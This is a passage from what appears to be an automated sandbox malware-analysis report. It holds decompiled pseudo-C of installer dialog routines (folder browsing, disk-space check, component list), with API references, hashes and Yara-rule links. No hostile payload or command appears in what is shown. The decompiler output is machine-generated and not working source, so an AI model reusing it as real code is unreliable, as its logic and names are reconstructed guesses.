										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405F83(0x421718);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x421718) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404F52(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x42923c + 0x10)) != _t158) {
									E00404F3A(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x421708);
									} else {
										E00404E71(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42a304 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E004045E6(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x423738 == _t158) {
									E00404A0E();
								}
								 *0x423738 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x423748;
							_v60 = E00404E0B;
							_v56 = _t146;
							_v68 = E004066A5(_t146, 0x423748, _t167, 0x421f20, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405F37(_t146);
								_t125 =  *((intOrPtr*)( *0x42a270 + 0x11c));
								if( *((intOrPtr*)( *0x42a270 + 0x11c)) != 0 && _t146 == L"C:\\Users\\Albus\\AppData\\Local\\Temp") {
									E004066A5(_t146, 0x423748, _t167, 0, _t125);
									if(lstrcmpiW(0x428200, 0x423748) != 0) {
										lstrcatW(_t146, 0x428200);
									}
								}
								 *0x423738 =  *0x423738 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405FAE(_t146) != 0 && E00405FE2(_t146) == 0) {
						E00405F37(_t146);
					}
					 *0x429238 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E004045C4(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E004045C4(_t167);
					E004045F9(_t166);
					_t138 = E00406A35(8);
					if(_t138 == 0) {
						L53:
						return E0040462B(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, 1);
						goto L8;
					}
				}
			}

0x00404ab5
0x00404abb
0x00404ac1
0x00404ace
0x00404adc
0x00404adf
0x00404ae7
0x00404aed
0x00404aed
0x00404af9
0x00404afc
0x00404b6a
0x00404b71
0x00404c48
0x00404c4f
0x00404c5e
0x00404c5e
0x00404c62
0x00404c6c
0x00404c79
0x00404c7b
0x00404c7b
0x00404c89
0x00404c90
0x00404c97
0x00404c9a
0x00404cd6
0x00404cd8
0x00404cde
0x00404ce3
0x00404ce7
0x00404ce9
0x00404ce9
0x00404d05
0x00000000
0x00404d07
0x00404d0a
0x00404d18
0x00404d1e
0x00404d1f
0x00404d22
0x00404d25
0x00000000
0x00404d25
0x00404c9c
0x00404c9e
0x00404ca2
0x00000000
0x00000000
0x00000000
0x00000000
0x00404ca4
0x00404ca4
0x00404cb1
0x00404cb6
0x00000000
0x00000000
0x00404cba
0x00404cbc
0x00404cbc
0x00404cc5
0x00404cc7
0x00404ccc
0x00404ccf
0x00404cd4
0x00000000
0x00000000
0x00000000
0x00000000
0x00404cd4
0x00404d31
0x00404d3b
0x00404d3e
0x00404d41
0x00404d48
0x00404d48
0x00404d4a
0x00404d4a
0x00404d4f
0x00404d51
0x00404d59
0x00404d60
0x00404d62
0x00404d6d
0x00404d6d
0x00404d62
0x00404d7d
0x00404d87
0x00404d8f
0x00404daa
0x00404d91
0x00404d9a
0x00404d9a
0x00404d8f
0x00404daf
0x00404db4
0x00404db9
0x00404dc2
0x00404dc2
0x00404dcb
0x00404dcd
0x00404dcd
0x00404dd9
0x00404de1
0x00404deb
0x00404deb
0x00404df0
0x00000000
0x00404df0
0x00404c9a
0x00404c51
0x00404c58
0x00000000
0x00000000
0x00000000
0x00404c58
0x00404b77
0x00404b80
0x00404b9a
0x00404b9f
0x00404ba9
0x00404bb0
0x00404bbc
0x00404bbf
0x00404bc2
0x00404bc9
0x00404bd1
0x00404bd4
0x00404bd8
0x00404bdf
0x00404be7
0x00404c41
0x00404be9
0x00404bea
0x00404bf1
0x00404bfb
0x00404c03
0x00404c10
0x00404c24
0x00404c28
0x00404c28
0x00404c24
0x00404c2d
0x00404c3a
0x00404c3a
0x00404be7
0x00000000
0x00404b9f
0x00404b8d
0x00000000
0x00000000
0x00404b93
0x00000000
0x00404afe
0x00404b0b
0x00404b14
0x00404b21
0x00404b21
0x00404b28
0x00404b2e
0x00404b37
0x00404b3a
0x00404b3d
0x00404b45
0x00404b48
0x00404b4b
0x00404b51
0x00404b58
0x00404b5f
0x00404df6
0x00404e08
0x00404b65
0x00404b68
0x00000000
0x00404b68
0x00404b5f

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404B04
SetWindowTextW.USER32 ref: 00404B2E
SHBrowseForFolderW.SHELL32(?), ref: 00404BDF
CoTaskMemFree.OLE32(00000000), ref: 00404BEA
lstrcmpiW.KERNEL32(Call,00423748,00000000,?,?), ref: 00404C1C
lstrcatW.KERNEL32 ref: 00404C28
SetDlgItemTextW.USER32 ref: 00404C3A

Part of subcall function 00405CAC: GetDlgItemTextW.USER32 ref: 00405CBF

Part of subcall function 004068EF: CharNextW.USER32(?), ref: 00406952
Part of subcall function 004068EF: CharNextW.USER32(?), ref: 00406961
Part of subcall function 004068EF: CharNextW.USER32(?), ref: 00406966
Part of subcall function 004068EF: CharPrevW.USER32(?,?), ref: 00406979

GetDiskFreeSpaceW.KERNEL32(00421718,?,?,0000040F,?,00421718,00421718,?,00000001,00421718,?,?,000003FB,?), ref: 00404CFD
MulDiv.KERNEL32 ref: 00404D18

Part of subcall function 00404E71: lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
Part of subcall function 00404E71: wsprintfW.USER32 ref: 00404F1B
Part of subcall function 00404E71: SetDlgItemTextW.USER32 ref: 00404F2E

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00404C05
Call, xrefs: 00404C16, 00404C1B, 00404C26
H7B, xrefs: 00404BB2
A, xrefs: 00404BD8

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$C:\Users\user\AppData\Local\Temp$Call$H7B
API String ID: 2624150263-563278023
Opcode ID: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
Instruction ID: 9155a42c54a3203d4d9709c494e168d8d926bd307d67cbb08bf4d9f42020e7e3
Opcode Fuzzy Hash: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
Instruction Fuzzy Hash: 94A171F1900219ABDB11EFA5CD41AAFB7B8EF84315F11843BF601B62D1D77C8A418B69

Uniqueness

Uniqueness Score: -1.00%

Function 0040290B Relevance: 1.5, APIs: 1, Instructions: 30
fileCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E0040290B(short __ebx, short* __edi) {
				void* _t21;

				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
					E004065AF( *((intOrPtr*)(_t21 - 0xc)), _t8);
					_push(_t21 - 0x2b0);
					_push(__edi);
					E00406668();
				} else {
					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
					 *__edi = __ebx;
					 *((intOrPtr*)(_t21 - 4)) = 1;
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}

0x00402923
0x0040293e
0x00402949
0x0040294a
0x00402a94
0x00402925
0x00402928
0x0040292b
0x0040292e
0x0040292e
0x00402c2d
0x00402c39

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 1358fc4729cd4e161e3f995057c9de5906a44dd4f8dff08d490623953bdc3ea8
Instruction ID: b84bdfeecc4e8c0803ac0e71b8711fc90ef1d688bdc4be786e729a17b55638d3
Opcode Fuzzy Hash: 1358fc4729cd4e161e3f995057c9de5906a44dd4f8dff08d490623953bdc3ea8
Instruction Fuzzy Hash: 47F05E71A04105EBDB01DBB4EE49AAEB378EF14314F60457BE101F21D0E7B88E529B29

Uniqueness

Uniqueness Score: -1.00%

Function 00405031 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489
windowmemoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00405031(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t198;
				intOrPtr _t201;
				long _t207;
				signed int _t211;
				signed int _t222;
				void* _t225;
				void* _t226;
				int _t232;
				long _t237;
				long _t238;
				signed int _t239;
				signed int _t245;
				signed int _t247;
				signed char _t248;
				signed char _t254;
				void* _t258;
				void* _t260;
				signed char* _t278;
				signed char _t279;
				long _t284;
				struct HWND__* _t291;
				signed int* _t292;
				int _t293;
				long _t294;
				signed int _t295;
				void* _t297;
				long _t298;
				int _t299;
				signed int _t300;
				signed int _t303;
				signed int _t311;
				signed char* _t319;
				int _t324;
				void* _t326;

				_t291 = _a4;
				_v12 = GetDlgItem(_t291, 0x3f9);
				_v8 = GetDlgItem(_t291, 0x408);
				_t326 = SendMessageW;
				_v24 =  *0x42a288;
				_v28 =  *0x42a270 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t301 = _a16;
					} else {
						_a12 = 0;
						_t301 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t301;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
							if(( *0x42a279 & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t237 = _v16;
									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
									}
									_t238 = _v16;
									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
										_t301 = _v24;
										_t239 =  *(_t238 + 0x5c);
										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
										} else {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t301 = 0 | _a8 != 0x00000413;
								_t245 = E00404F7F(_v8, _a8 != 0x413);
								_t295 = _t245;
								if(_t295 >= 0) {
									_t94 = _v24 + 8; // 0x8
									_t301 = _t245 * 0x818 + _t94;
									_t247 =  *_t301;
									if((_t247 & 0x00000010) == 0) {
										if((_t247 & 0x00000040) == 0) {
											_t248 = _t247 ^ 0x00000001;
										} else {
											_t254 = _t247 ^ 0x00000080;
											if(_t254 >= 0) {
												_t248 = _t254 & 0x000000fe;
											} else {
												_t248 = _t254 | 0x00000001;
											}
										}
										 *_t301 = _t248;
										E0040117D(_t295);
										_a12 = _t295 + 1;
										_a16 =  !( *0x42a278) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t301 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t225 =  *0x42372c;
								if(_t225 != 0) {
									ImageList_Destroy(_t225);
								}
								_t226 =  *0x423740;
								if(_t226 != 0) {
									GlobalFree(_t226);
								}
								 *0x42372c = 0;
								 *0x423740 = 0;
								 *0x42a2c0 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x42a279 & 0x00000001) != 0) {
									_t324 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t324);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
								}
								goto L93;
							} else {
								E004011EF(_t301, 0, 0);
								_t198 = _a12;
								if(_t198 != 0) {
									if(_t198 != 0xffffffff) {
										_t198 = _t198 - 1;
									}
									_push(_t198);
									_push(8);
									E00404FFF();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t301, 0, 0);
									_v36 =  *0x423740;
									_t201 =  *0x42a288;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x42a28c <= 0) {
										L86:
										if( *0x42a31e == 0x400) {
											InvalidateRect(_v8, 0, 1);
										}
										if( *((intOrPtr*)( *0x42923c + 0x10)) != 0) {
											E00404F3A(0x3ff, 0xfffffffb, E00404F52(5));
										}
										goto L90;
									}
									_t292 = _t201 + 8;
									do {
										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t207 != 0) {
											_t303 =  *_t292;
											_v72 = _t207;
											_v76 = 8;
											if((_t303 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t292[4]);
												_t292[0] = _t292[0] & 0x000000fe;
											}
											if((_t303 & 0x00000040) == 0) {
												_t211 = (_t303 & 0x00000001) + 1;
												if((_t303 & 0x00000010) != 0) {
													_t211 = _t211 + 3;
												}
											} else {
												_t211 = 3;
											}
											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageW(_v8, 0x113f, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t292 =  &(_t292[0x206]);
									} while (_v24 <  *0x42a28c);
									goto L86;
								} else {
									_t293 = E004012E2( *0x423740);
									E00401299(_t293);
									_t222 = 0;
									_t301 = 0;
									if(_t293 <= 0) {
										L74:
										SendMessageW(_v12, 0x14e, _t301, 0);
										_a16 = _t293;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
											_t301 = _t301 + 1;
										}
										_t222 = _t222 + 1;
									} while (_t222 < _t293);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t232 = SendMessageW(_v12, 0x147, 0, 0);
							if(_t232 == 0xffffffff) {
								goto L93;
							}
							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
								_t294 = 0x20;
							}
							E00401299(_t294);
							SendMessageW(_a4, 0x420, 0, _t294);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					_v20 = 2;
					 *0x42a2c0 = _t291;
					 *0x423740 = GlobalAlloc(0x40,  *0x42a28c << 2);
					_t258 = LoadImageW( *0x42a260, 0x6e, 0, 0, 0, 0);
					 *0x423734 =  *0x423734 | 0xffffffff;
					_t297 = _t258;
					 *0x42373c = SetWindowLongW(_v8, 0xfffffffc, E0040563E);
					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42372c = _t260;
					ImageList_AddMasked(_t260, _t297, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x42372c);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t297);
					_t298 = 0;
					do {
						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
							if(_t298 != 0x20) {
								_v20 = 0;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E004066A5(_t298, 0, _t326, 0, _t266)), _t298);
						}
						_t298 = _t298 + 1;
					} while (_t298 < 0x21);
					_t299 = _a16;
					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
					_push(0x15);
					E004045C4(_a4);
					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
					_push(0x16);
					E004045C4(_a4);
					_t300 = 0;
					_v16 = 0;
					if( *0x42a28c <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t319 = _v24 + 8;
						_v32 = _t319;
						do {
							_t278 =  &(_t319[0x10]);
							if( *_t278 != 0) {
								_v64 = _t278;
								_t279 =  *_t319;
								_v88 = _v16;
								_t311 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t311;
								_v44 = _t300;
								_v72 = _t279 & _t311;
								if((_t279 & 0x00000002) == 0) {
									if((_t279 & 0x00000004) == 0) {
										 *( *0x423740 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
									} else {
										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
									_v36 = 1;
									 *( *0x423740 + _t300 * 4) = _t284;
									_v16 =  *( *0x423740 + _t300 * 4);
								}
							}
							_t300 = _t300 + 1;
							_t319 =  &(_v32[0x818]);
							_v32 = _t319;
						} while (_t300 <  *0x42a28c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E004045F9(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E004045F9(_v12);
								L93:
								return E0040462B(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}

0x00405038
0x00405051
0x00405056
0x0040505e
0x00405064
0x0040507a
0x0040507d
0x004052a8
0x004052af
0x004052c3
0x004052b1
0x004052b3
0x004052b6
0x004052b7
0x004052be
0x004052be
0x004052cf
0x004052dd
0x004052e0
0x004052f6
0x0040536b
0x0040536e
0x00405370
0x0040537a
0x00405388
0x00405388
0x0040538a
0x00405394
0x0040539a
0x0040539d
0x004053a0
0x004053bb
0x004053a2
0x004053ac
0x004053ac
0x004053a0
0x00405394
0x00000000
0x0040536e
0x004052fb
0x00405306
0x0040530b
0x00405312
0x00405317
0x0040531b
0x00405326
0x00405326
0x0040532a
0x0040532e
0x00405332
0x00405345
0x00405334
0x00405334
0x0040533b
0x00405341
0x0040533d
0x0040533d
0x0040533d
0x0040533b
0x00405349
0x0040534b
0x0040535e
0x00405361
0x00405364
0x00405364
0x0040532e
0x00000000
0x0040531b
0x004052fd
0x00405304
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004053be
0x004053be
0x004053c5
0x00405436
0x0040543e
0x00405446
0x00405446
0x0040544f
0x00405451
0x00405458
0x0040545b
0x0040545b
0x00405461
0x00405468
0x0040546b
0x0040546b
0x00405471
0x00405477
0x0040547d
0x0040547d
0x0040548a
0x004055eb
0x004055f2
0x0040560f
0x00405615
0x00405627
0x00405627
0x00000000
0x00405490
0x00405492
0x00405497
0x0040549c
0x004054a1
0x004054a3
0x004054a3
0x004054a4
0x004054a5
0x004054a7
0x004054a7
0x004054af
0x004054f0
0x004054f2
0x00405502
0x00405505
0x0040550a
0x00405511
0x00405514
0x004055b6
0x004055bf
0x004055c7
0x004055c7
0x004055d5
0x004055e6
0x004055e6
0x00000000
0x004055d5
0x0040551a
0x0040551d
0x00405523
0x00405528
0x0040552a
0x0040552c
0x00405532
0x00405539
0x0040553e
0x00405545
0x00405548
0x00405548
0x0040554f
0x0040555b
0x0040555f
0x00405561
0x00405561
0x00405551
0x00405553
0x00405553
0x00405581
0x0040558d
0x0040559c
0x0040559c
0x0040559e
0x004055a1
0x004055aa
0x00000000
0x004054b1
0x004054bc
0x004054bf
0x004054c4
0x004054c6
0x004054ca
0x004054da
0x004054e4
0x004054e6
0x004054e9
0x00000000
0x00000000
0x00000000
0x00000000
0x004054cc
0x004054cc
0x004054d2
0x004054d4
0x004054d4
0x004054d5
0x004054d6
0x00000000
0x004054cc
0x004054af
0x0040548a
0x004053cd
0x00000000
0x004053e3
0x004053ed
0x004053f2
0x00000000
0x00000000
0x00405404
0x00405409
0x00405415
0x00405415
0x00405417
0x00405426
0x00405428
0x0040542c
0x0040542f
0x00000000
0x0040542f
0x004053cd
0x00405083
0x00405088
0x00405091
0x00405098
0x004050aa
0x004050b5
0x004050bb
0x004050c9
0x004050dd
0x004050e2
0x004050ef
0x004050f4
0x0040510a
0x0040511b
0x00405128
0x00405128
0x0040512b
0x00405131
0x00405133
0x00405136
0x0040513b
0x00405140
0x00405142
0x00405142
0x00405162
0x00405162
0x00405164
0x00405165
0x0040516a
0x00405170
0x00405174
0x00405179
0x00405181
0x00405185
0x0040518a
0x0040518f
0x00405197
0x0040519a
0x0040526a
0x0040527d
0x00000000
0x004051a0
0x004051a3
0x004051a6
0x004051a9
0x004051a9
0x004051af
0x004051b8
0x004051bb
0x004051bf
0x004051c2
0x004051c5
0x004051ce
0x004051d7
0x004051da
0x004051dd
0x004051e0
0x0040521e
0x00405249
0x00405220
0x0040522f
0x0040522f
0x004051e2
0x004051e5
0x004051f3
0x004051fd
0x00405205
0x0040520c
0x00405217
0x00405217
0x004051e0
0x0040524f
0x00405250
0x0040525c
0x0040525c
0x00405268
0x00405283
0x00405286
0x004052a3
0x00000000
0x00405288
0x0040528d
0x00405296
0x00405629
0x0040563b
0x0040563b
0x00405286
0x00000000
0x00405268
0x0040519a

APIs

GetDlgItem.USER32(?,000003F9), ref: 00405049
GetDlgItem.USER32(?,00000408), ref: 00405054
GlobalAlloc.KERNEL32(00000040,?), ref: 0040509E
LoadImageW.USER32 ref: 004050B5
SetWindowLongW.USER32 ref: 004050CE
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004050E2
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004050F4
SendMessageW.USER32(?,00001109,00000002), ref: 0040510A
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405116
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405128
DeleteObject.GDI32(00000000), ref: 0040512B
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405156
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405162
SendMessageW.USER32(?,00001132,00000000,?), ref: 004051FD
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040522D

Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607

SendMessageW.USER32(?,00001132,00000000,?), ref: 00405241
GetWindowLongW.USER32(?,000000F0), ref: 0040526F
SetWindowLongW.USER32 ref: 0040527D
ShowWindow.USER32(?,00000005), ref: 0040528D
SendMessageW.USER32(?,00000419,00000000,?), ref: 00405388
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004053ED
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405402
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405426
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405446
ImageList_Destroy.COMCTL32(?), ref: 0040545B
GlobalFree.KERNEL32(?), ref: 0040546B
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004054E4
SendMessageW.USER32(?,00001102,?,?), ref: 0040558D
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040559C
InvalidateRect.USER32(?,00000000,00000001), ref: 004055C7
ShowWindow.USER32(?,00000000), ref: 00405615
GetDlgItem.USER32(?,000003FE), ref: 00405620
ShowWindow.USER32(00000000), ref: 00405627

Strings

M, xrefs: 004051E5
, xrefs: 004055FF
N, xrefs: 004052C6

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 2564846305-813528018
Opcode ID: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
Instruction ID: a1eb65f7683e17450fca8d4cb4c1055b074660be5b1b810df034ff690b7f681c
Opcode Fuzzy Hash: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
Instruction Fuzzy Hash: 2A025CB0900609EFDF20DF65CD45AAE7BB5FB44315F10817AEA10BA2E1D7798A52CF18

Uniqueness

Uniqueness Score: -1.00%

Function 00404783 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00404783(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t110;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L13:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x421714 =  *0x421714 + 1;
							}
							L27:
							_t114 = _a16;
							L28:
							return E0040462B(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
